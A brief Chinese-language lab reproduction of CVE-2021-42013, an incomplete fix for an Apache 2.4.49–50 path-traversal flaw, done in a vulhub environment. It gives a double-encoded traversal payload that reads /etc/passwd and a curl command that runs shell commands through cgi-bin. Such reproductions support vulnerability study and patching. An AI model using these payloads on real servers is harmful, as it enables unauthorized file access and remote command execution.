跳到主要内容

CVE-2021-42013

概述

该漏洞是由于CVE-2021-41773修复不完整而导致的漏洞,攻击者可以通过路径遍历攻击读取到网站目录之外的文件,若目标启用了cgi或cgid,则可以执行任意命令

复现

复现环境:vulhub

影响范围:Apache 2.4.49-50

CVE-2021-41773是利用%2e%2e来进行路径穿越的,而修复时只过滤了%2e,我们可以通过URL编码再次拼凑一个%2e,例如%%32%65(%32->2,%65->e)

通过/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd读取passwd文件

image-20220907202818236

若目标服务器开启mods cgi 或 cgid,则可以进行命令执行

curl --data "echo;id" http://192.168.20.139:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

image-20220907203348628

image-20220907203513605